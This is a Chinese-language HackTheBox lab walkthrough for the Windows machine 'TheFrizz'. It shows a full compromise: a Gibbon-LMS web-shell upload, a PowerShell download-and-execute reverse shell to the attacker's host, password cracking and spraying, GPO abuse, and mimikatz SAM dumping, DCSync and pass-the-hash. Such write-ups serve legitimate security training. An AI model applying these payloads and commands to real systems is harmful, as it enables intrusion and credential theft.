HackTheBox TheFrizz Walkthrough

系统:windows
内容:kerberos登录ssh,GPO Abuse

首先提醒一下,这个机器不是特别稳定。
扫描端口情况如下。

PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-16 08:16:52Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
51211/tcp open  msrpc         Microsoft Windows RPC
51220/tcp open  msrpc         Microsoft Windows RPC
51248/tcp open  msrpc         Microsoft Windows RPC
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

将frizz.htb和frizzdc.frizz.htb加入hosts。
在Gibbon-LMS目录下,找到一个引用本地文件的页面。

利用Gibbon-LMS的上传漏洞,上传shell。这可能是user阶段最难处了。

~/D/t $curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=s_shell.php" \
--data-urlencode "gibbonPersonID=0000000001"
s_shell.php 
~/D/t $curl http://frizzdc.frizz.htb/Gibbon-LMS/s_shell.php?cmd=whoami
frizz\w.webservice
frizz\w.webservice 

验收shell上传成功后,本地建立一个php服务器。

~/D/t $sudo php -S 0.0.0.0:80
[Sun Mar 16 08:49:05 2025] PHP 8.4.4 Development Server (http://0.0.0.0:80) started
[Sun Mar 16 08:49:19 2025] 10.10.11.60:60589 Accepted
[Sun Mar 16 08:49:19 2025] 10.10.11.60:60589 [200]: GET /rev.ps1
[Sun Mar 16 08:49:19 2025] 10.10.11.60:60589 Closing

然后让shell执行启动rev shell的代码,注意传入参数要编码。

~/D/t $curl http://frizzdc.frizz.htb/Gibbon-LMS/s_shell.php?cmd=powershell%2Eexe%20%2Dc%20IEX%28New%2DObject%20Net%2EWebClient%29%2EDownloadString%28%27http%3A%2F%2F10%2E10%2E16%2E2%2Frev%2Eps1%27%29

本地监听端口可得到交互shell。

~/D/t $rlwrap nc -nlvp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.11.60 60590
SHELL> whoami
frizz\w.webservice

查看网站的配置文件config.php,得到数据库连接密码。

SHELL> type config.php
...
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';

查看一下域用户。

SHELL> net user

User accounts for \\FRIZZDC

-------------------------------------------------------------------------------
a.perlstein              Administrator            c.ramon
c.sandiego               d.hudson                 f.frizzle
g.frizzle                Guest                    h.arm
J.perlstein              k.franklin               krbtgt
l.awesome                m.ramon                  M.SchoolBus
p.terese                 r.tennelli               t.wright
v.frizzle                w.li                     w.Webservice
The command completed successfully.

由于shell不全交互,进入mysql的交互模式有问题,直接在命令行下查询数据库里的内容,得到一个密码的hash。

SHELL> cd mysql\bin
SHELL> .\mysql.exe -u MrGibbonsDB -pMisterGibbs!Parrot!?1 --database=gibbon -e "SHOW TABLES;"
...
gibbonperson
...
SHELL> .\mysql.exe -u MrGibbonsDB -pMisterGibbs!Parrot!?1 --database=gibbon -e "SELECT * FROM gibbonperson;"
gibbonPersonID  title   surname firstName       preferredName   officialName    nameInCharacters       gender  username        passwordStrong  passwordStrongSalt      passwordForceReset     status  canLogin        gibbonRoleIDPrimary     gibbonRoleIDAll dob   e
gibbonPersonID  title   surname firstName       preferredName   officialName    nameInCharacters       gender  username        passwordStrong  passwordStrongSalt      passwordForceReset     status  canLogin        gibbonRoleIDPrimary     gibbonRoleIDAll dob   e
gibbonPersonID  title   surname firstName       preferredName   officialName    nameInCharacters       gender  username        passwordStrong  passwordStrongSalt      passwordForceReset     status  canLogin        gibbonRoleIDPrimary     gibbonRoleIDAll dob   email    emailAlternate  image_240       lastIPAddress   lastTimestamp   lastFailIPAddress      lastFailTimestamp       failCount       address1        address1District      address1Country  address2        address2District        address2Country phone1Type    phone1CountryCode        phone1  phone3Type      phone3CountryCode       phone3  phone2Type     phone2CountryCode       phone2  phone4Type      phone4CountryCode       phone4website  languageFirst   languageSecond  languageThird   countryOfBirth  birthCertificateScan   ethnicity       religion        profession      employer        jobTitle      emergency1Name   emergency1Number1       emergency1Number2       emergency1Relationshipemergency2Name   emergency2Number1       emergency2Number2       emergency2RelationshipgibbonHouseID    studentID       dateStart       dateEnd gibbonSchoolYearIDClassOf     lastSchool       nextSchool      departureReason transport       transportNotes  calendarFeedPersonal   viewCalendarSchool      viewCalendarPersonal    viewCalendarSpaceBooking       gibbonApplicationFormID lockerNumber    vehicleRegistration     personalBackground     messengerLastRead       privacy dayType gibbonThemeIDPersonal   gibboni18nIDPersonal   studentAgreements       googleAPIRefreshToken   microsoftAPIRefreshToken      genericAPIRefreshToken   receiveNotificationEmails       mfaSecret       mfaToken      cookieConsent    fields
0000000001      Ms.     Frizzle Fiona   Fiona   Fiona Frizzle           Unspecified   f.frizzle        067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03      /aACFhikmNopqrRTVz2489   N       Full    Y       001     001     NULL    f.frizzle@frizz.htb    NULL    NULL    ::1     2024-10-29 09:28:59     NULL    NULL    0             NULL             NULL    NULL    NULL                                                  YY       N       NULL                            NULL    NULL    NULL    NULL    NULL  NULL                             Y       NULL    NULL    NULL

使用hashcat可以破解密码,注意正确的hash文件格式。

~/D/t $cat hash.txt
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489
~/D/t $hashcat -m 1420 hash.txt --wordlist /usr/share/wordlists/rockyou.txt
...
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23
...

在使用NTLM形式验证登录时,显示不支持。

~/D/t $/opt/check_auth.sh -u f.frizzle -p Jenni_Luvs_Magic23  $IP
Running: netexec smb 10.10.11.60 -u f.frizzle -p Jenni_Luvs_Magic23
SMB                      10.10.11.60     445    10.10.11.60      [*]  x64 (name:10.10.11.60) (domain:10.10.11.60) (signing:True) (SMBv1:False)
SMB                      10.10.11.60     445    10.10.11.60      [-] 10.10.11.60\f.frizzle:Jenni_Luvs_Magic23 STATUS_NOT_SUPPORTED
----------------------------------------
Running: netexec winrm 10.10.11.60 -u f.frizzle -p Jenni_Luvs_Magic23

----------------------------------------
Running: netexec ldap 10.10.11.60 -u f.frizzle -p Jenni_Luvs_Magic23
LDAP                     10.10.11.60     389    frizzdc.frizz.htb [*]  x64 (name:frizzdc.frizz.htb) (domain:frizz.htb) (signing:True) (SMBv1:False)
LDAP                     10.10.11.60     389    frizzdc.frizz.htb [-] frizz.htb\f.frizzle:Jenni_Luvs_Magic23 STATUS_NOT_SUPPORTED
----------------------------------------

看来要使用kerberos验证。先获取票据。

~/D/t $sudo ntpdate -u $IP
2025-03-16 16:12:20.563492 (+0100) +24108.979646 +/- 0.047245 10.10.11.60 s1 no-leap
CLOCK: time stepped by 24108.979646

~/D/t $impacket-getTGT frizz.htb/f.frizzle:Jenni_Luvs_Magic23 -k  -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in f.frizzle.ccache

~/D/t $export KRB5CCNAME=f.frizzle.ccache

取得票据后,kerberos可以登录smb和ldap。

~/D/t $netexec smb frizzdc.frizz.htb -d frizz.htb  -k --use-kcache
SMB         frizzdc.frizz.htb 445    frizzdc          [*]  x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False)
SMB         frizzdc.frizz.htb 445    frizzdc          [+] frizz.htb\f.frizzle from ccache

~/D/t $netexec winrm frizzdc.frizz.htb -d frizz.htb  -k --use-kcache

~/D/t $netexec ldap frizzdc.frizz.htb -d frizz.htb  -k --use-kcache
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb [*]  x64 (name:frizzdc.frizz.htb) (domain:frizz.htb) (signing:True) (SMBv1:False)
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb [+] frizz.htb\f.frizzle from ccache

可以收集bloodhound信息了。

~/D/t $netexec ldap frizzdc.frizz.htb -d frizz.htb  -k --use-kcache --bloodhound --collection All --dns-server $IP
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb [*]  x64 (name:frizzdc.frizz.htb) (domain:frizz.htb) (signing:True) (SMBv1:False)
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb [+] frizz.htb\f.frizzle from ccache
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb Resolved collection methods: session, dcom, localadmin, group, objectprops, psremote, rdp, trusts, acl, container
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb Using kerberos auth without ccache, getting TGT
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb Using kerberos auth from ccache
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb Done in 00M 24S
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb Compressing output into /home/kali/.nxc/logs/frizzdc.frizz.htb_frizzdc.frizz.htb_2025-03-16_162223_bloodhound.zip

在bloodhound中查看到f.frizzle属于winrm用户组。测试后,发现无法登录winrm,但可以登录ssh(由于机器不稳定,有时ssh也登录不上)。要提前设置好/etc/krb5.conf。至此取得user flag。

~/D/t $cat /etc/krb5.conf
[libdefault]
        default_realm = FRIZZ.HTB

[realms]
        FRIZZ.HTB = {
                kdc = frizzdc.frizz.htb
                admin_server = frizzdc.frizz.htb
        }

[domain_realm]
        frizz.htb = FRIZZ.HTB
        .frizz.htb = FRIZZ.HTB

~/D/t $evil-winrm -i frizzdc.frizz.htb  -r frizz.htb
...
Error: An error of type HTTPClient::ConnectTimeoutError happened, message is execution expired

Error: Exiting with code 1
malloc(): unaligned fastbin chunk detected
zsh: IOT instruction  evil-winrm -i frizzdc.frizz.htb -r frizz.htb
~/D/t $ssh f.frizzle@$IP
The authenticity of host '10.10.11.60 (10.10.11.60)' can't be established.
ED25519 key fingerprint is SHA256:667C2ZBnjXAV13iEeKUgKhu6w5axMrhU346z2L2OE7g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.60' (ED25519) to the list of known hosts.
PowerShell 7.4.5
PS C:\Users\f.frizzle> whoami
frizz\f.frizzle
PS C:\Users\f.frizzle> tree . /F
Folder PATH listing
Volume serial number is 000001EF D129:C3DA
C:\USERS\F.FRIZZLE
├───Desktop
│       user.txt
│
├───Documents
├───Downloads
├───Favorites
├───Links
├───Music
├───Pictures
├───Saved Games
└───Videos

接下来要查找如何root。上传winPEAS也没有找到任何有用的信息。但是在回收站里发现有个隐藏的目录和文件。

PS C:\$RECYCLE.BIN> dir  -Force

    Directory: C:\$RECYCLE.BIN

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d--hs          10/29/2024  7:31 AM                S-1-5-21-2386970044-1145388522-29327
                                                  01813-1103

PS C:\$RECYCLE.BIN> dir S-1-5-21-2386970044-1145388522-2932701813-1103

    Directory: C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a---          10/29/2024  7:31 AM            148 $IE2XMEG.7z
-a---          10/24/2024  9:16 PM       30416987 $RE2XMEG.7z

将这两个压缩文件复制下来。

~/D/t $scp -o GSSAPIAuthentication=yes -o GSSAPIDelegateCredentials=yes f.frizzle@$IP:'c:/temp/IE2XMEG.7z' ./
IE2XMEG.7z                                          100%  148     0.8KB/s   00:00
~/D/t $scp -o GSSAPIAuthentication=yes -o GSSAPIDelegateCredentials=yes f.frizzle@$IP:'c:/temp/RE2XMEG.7z' ./
RE2XMEG.7z                                          100%   29MB   3.7MB/s   00:07

本地解压缩,重叠一个wapt目录。

~/D/t $7z x  RE2XMEG.7z

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
 64-bit locale=C.UTF-8 Threads:4 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 30416987 bytes (30 MiB)

Extracting archive: RE2XMEG.7z
--
Path = RE2XMEG.7z
Type = 7z
Physical Size = 30416987
Headers Size = 65880
Method = ARM64 LZMA2:26 LZMA:20 BCJ2
Solid = +
Blocks = 3

Everything is Ok

Folders: 684
Files: 5384
Size:       141187501
Compressed: 30416987

展开后在配置文件里找到一个密码。

~/D/t/w/c $cat waptserver.ini
[options]
allow_unauthenticated_registration = True
wads_enable = True
login_on_wads = True
waptwua_enable = True
secret_key = ylPYfn9tTU9IDu9yssP2luKhjQijHKvtuxIzX9aWhPyYKtRO7tMSq5sEurdTwADJ
server_uuid = 646d0847-f8b8-41c3-95bc-51873ec9ae38
token_secret_key = 5jEKVoXmYLSpi5F7plGPB4zII5fpx0cYhGKX5QC0f7dkYpYmkeTXiFlhEJtZwuwD
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
clients_signing_key = C:\wapt\conf\ca-192.168.120.158.pem
clients_signing_certificate = C:\wapt\conf\ca-192.168.120.158.crt

[tftpserver]
root_dir = c:\wapt\waptserver\repository\wads\pxe
log_path = c:\wapt\log
~/D/t $echo  IXN1QmNpZ0BNZWhUZWQhUgo= |base64 -d
!suBcig@MehTed!R

使用密码喷洒可以得到该密码属于m.schoolbus用户。

~/D/t $kerbrute_linux_amd64 passwordspray  --dc frizzdc.frizz.htb -d frizz.htb names.txt '!suBcig@MehTed!R'

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 03/19/25 - Ronnie Flathers @ropnop

2025/03/19 13:23:38 >  Using KDC(s):
2025/03/19 13:23:38 >   frizzdc.frizz.htb:88

2025/03/19 13:23:39 >  [+] VALID LOGIN:  M.SchoolBus@frizz.htb:!suBcig@MehTed!R
2025/03/19 13:23:39 >  Done! Tested 21 logins (1 successes) in 0.664 seconds

接着取得M.SchoolBus的票据,并登录ssh。

~/D/t $impacket-getTGT frizz.htb/M.SchoolBus:'!suBcig@MehTed!R' -k  -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in M.SchoolBus.ccache

~/D/t $export KRB5CCNAME=M.SchoolBus.ccache

~/D/t $ssh M.SchoolBus@$IP
PS C:\Users\M.SchoolBus> whoami
frizz\m.schoolbus

在bloodhound可以看到,M.SchoolBus属于组策略创建者的拥有者组。

接下来就是利用组策略的权限,进行GPO Abuse。

PS C:\Users\M.SchoolBus\Downloads> New-GPO -Name "whatever"

DisplayName      : whatever
DomainName       : frizz.htb
Owner            : frizz\M.SchoolBus
Id               : 395e9018-e87e-4ef4-aa68-e4e9667da882
GpoStatus        : AllSettingsEnabled
Description      :
CreationTime     : 3/19/2025 5:49:59 AM
ModificationTime : 3/19/2025 5:49:59 AM
UserVersion      :
ComputerVersion  :
WmiFilter        :

PS C:\Users\M.SchoolBus\Downloads> New-GPLink -Name "whatever" -Target "OU=Domain Controllers,DC=frizz,DC=htb"

GpoId       : 395e9018-e87e-4ef4-aa68-e4e9667da882
DisplayName : whatever
Enabled     : True
Enforced    : False
Target      : OU=Domain Controllers,DC=frizz,DC=htb
Order       : 2

PS C:\Users\M.SchoolBus\Downloads> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName whatever
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of M.SchoolBus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "whatever" is: {395E9018-E87E-4EF4-AA68-E4E9667DA882}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{395E9018-E87E-4EF4-AA68-E4E9667DA882}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!

PS C:\Users\M.SchoolBus\Downloads> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

PS C:\Users\M.SchoolBus\Downloads> .\RunasCs.exe "M.SchoolBus"  '!suBcig@MehTed!R' powershell.exe -r 10.10.16.2:1234

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-330d59$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2628 created in background.

本地可以得到系统权限的rev shell。

PS C:\Windows\system32> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Disabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Disabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Disabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Disabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Disabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled

可以上传mimikatz,得到administrator的hash。

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

568     {0;000003e7} 1 D 36007          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)     Primary
 -> Impersonated !
 * Process Token : {0;0009c0bc} 0 D 651587      frizz\M.SchoolBus       S-1-5-21-2386970044-1145388522-2932701813-1106        (16g,26p)       Primary
 * Thread Token  : {0;000003e7} 1 D 727973      NT AUTHORITY\SYSTEM     S-1-5-18     (04g,21p)        Impersonation (Delegation)

mimikatz # lsadump::sam
Domain : FRIZZDC
SysKey : 02a7ae01010ecbfb70406e489a435ec7
Local SID : S-1-5-21-3873670720-2504411258-3912888090

SAMKey : 955b8e610ae76fc77ed8f9dc041048be

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: c299f8b2acc2da429d3a35953b3854d7

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount

mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

mimikatz # lsadump::dcsync /domain:frizz.htb /user:Administrator
[DC] 'frizz.htb' will be the domain
[DC] 'frizzdc.frizz.htb' will be the DC server
[DC] 'Administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration   :
Password last change : 2/25/2025 2:24:10 PM
Object Security ID   : S-1-5-21-2386970044-1145388522-2932701813-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: c457b5f1c315bef53b9cabc92e993d0b

然后可以以administrator身份直接登录(ssh登录又出错了)。

~/D/t $impacket-wmiexec   frizz.htb/administrator@frizzdc.frizz.htb -hashes :c457b5f1c315bef53b9cabc92e993d0b -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
0

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注